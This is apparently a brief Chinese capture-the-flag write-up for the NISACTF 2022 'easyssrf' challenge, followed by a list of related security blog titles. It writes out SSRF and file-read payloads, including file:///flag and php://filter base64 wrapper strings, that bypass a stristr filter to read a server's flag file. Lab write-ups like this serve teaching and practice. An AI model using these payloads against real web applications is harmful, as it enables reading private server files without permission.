[NISACTF 2022]easyssrf

它提示我们输入 那我们输入file:///flag file:// 访问本地文件系统

它提醒我们输file:///fl4g

它提醒我们输ha1x1ux1u.php

看到代码stristr($file, "file")当我们输入file它会提示我们输了 啥意思可以前面加个/ 也可以通过read读取 思路都是前面加/不等于flag绕过

file=php://filter/read=convert.base64-encode/resource=/flag 这个需要base64解码

file=php://filter/resource=/flag

file=/flag


相关推荐
qq_243050799 小时前
irpas:互联网路由协议攻击套件!全参数详细教程!Kali Linux入门教程!黑客渗透测试!
linux·网络·web安全·网络安全·黑客·渗透测试·系统安全
H轨迹H18 小时前
DVWA靶场XSS漏洞通关教程及源码审计
网络安全·渗透测试·xss·dvwa·web漏洞
希望奇迹很安静20 小时前
[极客大挑战 2019]PHP
开发语言·学习·web安全·php·ctf·buuctf
doubt。1 天前
【BUUCTF】BUU XSS COURSE 11
笔记·学习·安全·web安全·网络安全·web·xss
黑客笔记1 天前
xctf-comment(Intruder,git恢复,SQL注入,Hex解码)
web安全·网络安全
希望奇迹很安静1 天前
[HCTF 2018]WarmUp
学习·web安全·ctf·buuctf
然然阿然然2 天前
2025.1.20——一、[RCTF2015]EasySQL1 二次注入|报错注入|代码审计
数据库·sql·学习·安全·web安全·网络安全
玥轩_5212 天前
《Linux服务与安全管理》| 邮件服务器安装和配置
linux·服务器·网络·数据库·网络安全·redhat·邮件服务器
莫名有雪2 天前
BUUCTF_Web([GYCTF2020]Ezsqli)
网络安全